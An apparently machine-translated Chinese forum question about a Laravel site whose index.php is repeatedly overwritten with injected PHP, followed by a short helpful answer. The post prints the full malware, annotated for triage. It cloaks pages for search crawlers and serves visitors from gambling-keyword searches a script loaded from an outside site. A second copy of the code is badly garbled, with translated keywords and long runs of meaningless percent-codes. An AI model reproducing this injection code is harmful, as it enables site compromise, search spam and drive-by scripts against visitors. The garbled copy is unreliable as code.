360 Spider Bot 在线上 Laravel 项目的 storage 文件夹中创建了文件

360 Spider Bot在现场laravel项目的存储文件夹中创建了文件,laravel,.htaccess,robots.txt,Laravel,.htaccess,Robots.txt,在我的实时站点上,有人将文件上传到存储文件夹中 甚至他也没有访问Cpanel或FTP的权限 但我的index.php总是用一些原始代码编写过度 function _spider() { $agent = strtolower($_SERVER['HTTP_USER_AGENT']); $spiderArr = array('360spider', 'so', 'soso', 'bing', 'sogou', 'sm', 'yahoo'); foreach($spiderArr

在我的线上站点上,有人把文件上传到了 storage 文件夹,尽管他并没有 cPanel 或 FTP 的访问权限;而且我的 index.php 总是被下面这段代码覆盖:

/**
 * Cloaking check: does the current request look like a search-engine crawler?
 *
 * This function is part of the code the poster found written into index.php.
 * It is annotated here for triage only; the code itself is left exactly as found.
 *
 * Two signals are used, both plain substring matches on lower-cased input:
 *   1. the User-Agent request header against a list of crawler names;
 *   2. the reverse-DNS name of the client address against a second list.
 *
 * @return true|null true on the first match; otherwise execution falls off the
 *                   end of the function and the implicit return value is null (falsy).
 */
function _spider() {
   // Read without an existence check or @-suppression, unlike the other
   // $_SERVER reads in this sample.
   $agent = strtolower($_SERVER['HTTP_USER_AGENT']);
   // Needles such as 'so' and 'sm' are only two letters long, so any
   // User-Agent that merely contains those letters also matches.
   $spiderArr = array('360spider', 'so', 'soso', 'bing', 'sogou', 'sm', 'yahoo');
   foreach($spiderArr as $v) {
       if(strpos($agent, $v) !== false) {
           return true;
       }
   }
   // Reached only when the User-Agent did not match: a reverse DNS lookup of
   // the client address is made for each such request. On an affected host this
   // shows up as outbound PTR queries from the web server.
   $hostname = strtolower(gethostbyaddr(@$_SERVER['REMOTE_ADDR']));
   $spiderArr = array('sogouspider', 'hn.kd.ny.adsl', 'msnbot');
   foreach($spiderArr as $v) {
       if(strpos($hostname, $v) !== false) {
           return true;
       }
   }
}

/**
 * Entry-page check: is the executing script one of the site's landing scripts?
 *
 * Part of the code found injected into index.php; annotated for triage, code unchanged.
 * Matches the lower-cased SCRIPT_NAME against the substrings below, so the
 * cloaked content is limited to scripts whose path contains one of them.
 *
 * @return true|null true on a match; implicit null (falsy) otherwise.
 */
function _main() {
   $index = strtolower($_SERVER['SCRIPT_NAME']);
   // Substring match, so e.g. any path containing "index" qualifies.
   $indexArr = array('index', 'default', 'home', 'safe');
   foreach($indexArr as $v) {
       if(strpos($index, $v) !== false) {
           return true;
       }
   }
}

/**
 * Referrer check: did the visitor arrive from one of the listed search engines?
 *
 * Part of the code found injected into index.php; annotated for triage, code unchanged.
 * The Referer header is client-supplied. It is lower-cased and tested with
 * plain substring matches.
 *
 * @return bool|null false when no Referer was sent, true on a match,
 *                   implicit null (falsy) when a Referer is present but nothing matches.
 */
function _from() {
   // @ hides the notice raised when the request carries no Referer header.
   $referer = strtolower(@$_SERVER['HTTP_REFERER']);
   if(empty($referer)) {
       return false;
   } 
   // Short markers such as '360' and 'sm' match anywhere in the URL, not only
   // in the host part.
   $refeerArr = array('so.com', '360', 'soso', 'bing', 'sogou' ,'sm', 'yahoo');
   foreach($refeerArr as $v) {
       if(strpos($referer, $v) !== false) {
           return true;
       }
   }
}

/**
 * Keyword check: does the Referer URL contain one of the targeted search terms?
 *
 * Part of the code found injected into index.php; annotated for triage, code unchanged.
 * The list holds percent-encoded byte sequences plus a few ASCII strings
 * ('lhc', 'mahui', 'tema', 'xianggang'). Many entries appear to come in pairs,
 * presumably the same Chinese term in a GB2312/GBK encoding and in UTF-8.
 * For example, '%E9%A6%99%E6%B8%AF' is the UTF-8 encoding of 香港. The terms
 * look lottery- and gambling-related (TODO: confirm by decoding the full list).
 *
 * @return bool|null false when no Referer was sent, true on a match,
 *                   implicit null (falsy) otherwise.
 */
function _keywords() {
   // @ hides the notice raised when the request carries no Referer header.
   $referer = strtolower(@$_SERVER['HTTP_REFERER']);
   if(empty($referer)) {
       return false;
   } 
   // NOTE(review): in this copy of the sample one entry is broken across a line
   // break ('%' at the end of one line, 'c5%dc%b9%b7' at the start of the next),
   // so that literal contains a newline. It is left byte-for-byte as found.
   $refeerArr = array('%C1%F9','%E5%85%AD','%BA%CF','%E5%90%88','%BA%CD','%E5%92%8C','%B2%CA','%E5%BD%A9','%CC%D8','%E7%89%B9','%C2%EB','%E7%A0%81','%BD%B1','%E5%A5%96','%C6%DA','%E6%9C%9F','%D0%A4','%E8%82%96','%CD%BC','%E5%9B%BE','lhc','lhc','%CF%E3%B8%DB','%E9%A6%99%E6%B8%AF','6%BA%CF','6%E5%90%88','%C2%ED%BB%E1','%E9%A9%AC%E4%BC%9A','%CC%D8%C2%EB','%E7%89%B9%E7%A0%81','%C2%DB%CC%B3','%E8%AE%BA%E5%9D%9B','%C1%F9%BA%CF','%E5%85%AD%E5%90%88','%BF%AA%BD%B1','%E5%BC%80%E5%A5%96','%BD%E1%B9%FB','%E7%BB%93%E6%9E%9C','%CD%BC%BF%E2','%E5%9B%BE%E5%BA%93','%D0%C4%CB%AE','%E5%BF%83%E6%B0%B4','%B9%DC%BC%D2%C6%C5','%E7%AE%A1%E5%AE%B6%E5%A9%86','%B0%D7%D0%A1%BD%E3','%E7%99%BD%E5%B0%8F%E5%A7%90','%D7%DF%CA%C6%CD%BC','%E8%B5%B0%E5%8A%BF%E5%9B%BE','%C0%CF%C7%AE%D7%AF','%E8%80%81%E9%92%B1%E5%BA%84','%D4%F8%B5%C0%C8%CB','%E6%9B%BE%E9%81%93%E4%BA%BA','%BF%AA%BD%B1%D6%B1%B2%A5','%E5%BC%80%E5%A5%96%E7%9B%B4%E6%92%AD','%B1%BE%C6%DA','%E6%9C%AC%E6%9C%9F','%D6%B1%B2%A5','%E7%9B%B4%E6%92%AD','%D7%CA%C1%CF','%E8%B5%84%E6%96%99','%CF%D6%B3%A1','%E7%8E%B0%E5%9C%BA','%BC%C7%C2%BC','%E8%AE%B0%E5%BD%95','%B1%A8','%E6%8A%A5','%CD%BC%D6%BD','%E5%9B%BE%E7%BA%B8','%CD%F8%D6%B7','%E7%BD%91%E5%9D%80','%B4%F3%C8%AB','%E5%A4%A7%E5%85%A8','%D0%FE%BB%FA','%E7%8E%84%E6%9C%BA','%D4%A4%B2%E2','%E9%A2%84%E6%B5%8B','%B9%AB%CA%BD','%E5%85%AC%E5%BC%8F','%BA%C5%C2%EB','%E5%8F%B7%E7%A0%81','%B5%D8%CF%C2','%E5%9C%B0%E4%B8%8B','%B9%D2%C5%C6','%E6%8C%82%E7%89%8C','%B2%D8%B1%A6','%E8%97%8F%E5%AE%9D','%C3%E2%B7%D1','%E5%85%8D%E8%B4%B9','%C0%FA%CA%B7','%E5%8E%86%E5%8F%B2','%CC%EC%CF%DF','%E5%A4%A9%E7%BA%BF','%CC%FA%CB%E3%C5%CC','%E9%93%81%E7%AE%97%E7%9B%98','%BA%EC%BD%E3','%E7%BA%A2%E5%A7%90','%D0%C4%BE%AD','%E5%BF%83%E7%BB%8F','%e9%87%91%e5%a4%9a%e5%ae%9d','%bd%f0%b6%e0%b1%a6','%e4%ba%8c%e5%8d%81%e5%85%ad','%b6%fe%cb%c4%c1%f9','%e5%a4%a9%e7%a9%ba','%cc%ec%bf%d5','%e5%87%8c%e6%b3%a2','%c1%e8%b2%a8','%e7%ba%a2','%ba%ec','%e8%93%9d','%c0%b6','%e7%bb%bf','%c2%cc','%e4%ba%94%e8%a1%8c','%ce%e5%d0%d0','%e8%b7%91%e7%8b%97','%
c5%dc%b9%b7','%e5%9b%9b%e4%b8%8d%e5%83%8f','%cb%c4%b2%bb%cf%f1','%e4%b8%ad','%d6%d0','mahui','tema','xianggang');
   foreach($refeerArr as $v) {
       // stripos() is case-insensitive, so the upper-case hex entries still
       // match the already lower-cased Referer.
       if(stripos($referer, $v) !== false) {
           return true;
       }
   }
}

// Dispatch logic of the injected snippet, annotated for triage with the code
// unchanged. Two audiences get a different response than a normal visitor,
// which is why the site can look clean when the owner opens it directly.
// Comparing the response for one URL under a browser User-Agent and under a
// crawler User-Agent shows the difference.

// Branch 1: a crawler-looking request to an index/default/home/safe script.
if(_spider() && _main()) {
   // Discards the active output buffer; @ hides the notice when none exists.
   @ob_end_clean();
   // The file is echoed as the response body whatever its .gif name suggests.
   // Presumably it holds the page served to crawlers, so keep a copy and a
   // hash of it as evidence before cleaning up. The relative path resolves
   // against the working directory of the running script.
   echo @file_get_contents('./storage/zhuayt.gif');
   // Appends the server time as an HTML comment.
   echo '<!--'.date('Y-m-d H:i:s').'-->';
   @ob_end_flush();
   // Stops here, so the site's own code never runs for this request.
   exit();
}
// Branch 2: a visitor whose Referer contains a targeted keyword AND a listed
// search-engine marker.
if(_keywords()){
   if(_from()){
       @ob_end_clean();
       // The whole response is a single tag that loads a third-party script.
       // The host in this URL is an indicator worth searching for in web
       // files and proxy/DNS logs.
       echo '<script language="javascript" src="https://www.8686pro.com/aa.js"></script><br/>';
       @ob_end_flush();
       exit();
   }
}
// Reached only when neither branch exited. Sets the response charset to gb2312
// for whatever follows this snippet in the file (not shown here).
header("Content-Type: text/html; charset=gb2312");
函数_spider(){
$agent=strtolower($\服务器['HTTP\用户\代理]);
$spiderArr=数组('360spider','so','soso','bing','sogou','sm','yahoo');
foreach($spiderArr作为$v){
if(strpos($agent,$v)!==false){
返回true;
}
}
$hostname=strtolower(gethostbyaddr(@$_SERVER['REMOTE_ADDR'));
$spiderArr=array('sogouspider','hn.kd.ny.adsl','msnbot');
foreach($spiderArr作为$v){
if(strpos($hostname,$v)!==false){
返回true;
}
}
}
函数_main(){
$index=strtolower($_服务器['SCRIPT_NAME']);
$indexArr=array('index','default','home','safe');
foreach($v为索引){
if(strpos($index,$v)!==false){
返回true;
}
}
}
函数_from(){
$referer=strtolower(@$_SERVER['HTTP_referer']);
if(空($referer)){
返回false;
} 
$refeerArr=array('so.com','360','soso','bing','sogou','sm','yahoo');
foreach($refeerArr作为$v){
if(strpos($referer,$v)!==false){
返回true;
}
}
}
函数_关键字(){
$referer=strtolower(@$_SERVER['HTTP_referer']);
if(空($referer)){
返回false;
} 
$refeerArr=数组“C1%F9',(%C1%F9 9',,%E5%5%5%85%10%10%9%8,,,%BA%CD,,%E5%92%8C,,,%B2%Ca9%7%F9',,,%C1%9%9%9%9%9.9%7%5%5%5%5%5%9%9%9%7%9%9%10%9%9%7%9%9%9%广告',,,,,,%5%5%7%5%5%5%5%5%5%5%5%5%5%5%5%5%5%5%5%5%5%5%5%5%5%5%5%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%9%99%E6%B8%AF','6%BA%CF','6%E5%90%88','%C2%ED%BB%E1','%E9%A9%AC%E4%BC%9A','%CC%D8%C2%EB','%E7%89%B9%E7%A0%8.8%的A8%的A8%的A8%的A8%的A8%的A8%的A8%的A9%的Ba9%的C7%的F9%的Ba6%的CF,,,,,%E5%的85%的85%的A5%的A5%的A5%的A9%的A9%的10%的10%的10%的10%的10%的A9%的10%的A7%的A7%的A9%的A7%的A7%的10%的A7%的10%的10%的Ba7%的10%的10%的Ba7%的10%的Ba7%的10%的10%的C7%的10%的10%的C7%的C7%的C7%的C7%的C7%的C7%的C7%的C7%的10%的10%的C7%的C7%的C7%的C7%的C7%的AE%A1%E5%AE%B6%E5%A9%86'、'%B0%D7%D0%A1%BD%E3'、'%E7%99%BD%E5%B0%8F%E5%A7%90'、'%D7%DF%CA%C6%CD%BC'、'%E8%7.7%A7%7%A7%的7%A7%A7%的7%AF,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,E8%8%80%80%81%81%81%81%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%9%E9%E9%9%9%9%9%9%9%9%9%E9%9%9%9%9%9%9%9%9%9%E9%9%9%9%9%9%9%9%9%B1%B2%A5'、'%E7%9B%B4%E6%92%AD'、'%D7%CA%C1%CF'、'%E8%B5%84%E6%96%99'、'%CF%D6%B3%A1'、'%E7%8E%B0%E5%9C%BA'、'%BC%C7%C2%B“E8%A8,,,,'%E8%A8%A8%8%8%A8,,'%E6%8A%5,,'%CD%BC%D6%BD,,,'%E5%9%B%B%5%B%5%B%B%7%7%7%7%7%7%8%8%8%8%8%A8%8%8%8%8%8%8%8%8%8%8%8%8%5%8%8%8%8%5%8%8%8%8%8%8%8%5%8%8%8%8%8%8%8%8%8%8%8%8%8%8%5%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%CA%BD','%E5%85%AC%E5%BC%8F','%BA%C5%C2%EB','%E5%8F%B7%E7%A0%81','%B5%D8%CF%C2','%E5%9C%B0%E4%B8%8B','%B9%D2%C6','%8.8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%6%8%7%5%6%5%8%6%5%6%5%6%6%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8%8 
A2%E5%A7%90','%D0%C4%BE%AD','%E5%BF%83%E7%BB%8F','%E9%87%91%E5%A4%9a%E5%AE%9D','%BD%f0%b6%e0%B1%A6','%e4%BA%8C%e5%a4%a9%a9%a9%A7%a9%A7%A7%7%7%7%9%A7%A7%7%A7%7%A7%A7%7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%A7%7%A7%A7%A7%A7%A7%A7%A7%7%A7%A7%A7%A7%A7%A7%A7%A7%7%A7%A7%A7%A7%7%7%7%A7%A7%7%7%7%7%7%A7%7%A7%A7%7%7%7%7%7%7 dc%b9%b7'、'%e5%9b%9b%e4%b8%8d%e5%83%8f'、'%cb%c4%b2%bb%cf%f1'、'%e4%b8%ad'、'%d6%d0'、'mahui'、'tema'、'Xiangang');
foreach($refeerArr作为$v){
if(stripos($referer,$v)!==false){
返回true;
}
}
}
如果(_spider()&&&_main()){
@ob_end_clean();
echo@file_get_内容('./storage/zhuayt.gif');
回声';
@ob_end_flush();
退出();
}
如果(_关键字()){
如果(_from()){
@ob_end_clean();
回声“
”; @ob_end_flush(); 退出(); } } 标题(“内容类型:text/html;字符集=gb2312”);
这段代码被写进了该文件中。有人能帮我吗?

storage 文件夹的权限是 755,但我不知道他是怎么上传的。没有 FTP,他怎么能访问我的网站?


请帮帮我。

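这意味着可能有人能够以某种方式在服务器上加载自定义代码,这可能是由应用程序中的安全漏洞造成的。换句话说,文件很可能是由 Web 服务器上运行的 PHP 进程自己写入的,所以对方并不需要 FTP 或 cPanel 权限;755 权限也不会阻止目录所有者(往往就是运行 PHP 的用户)写入。只恢复 index.php 是不够的:还需要找出并修补写入的入口,并检查 storage 等目录中是否留有其他陌生文件,否则 index.php 还会再次被覆盖。

噢,谢谢你救了我,伙计,我之前不知道这件事。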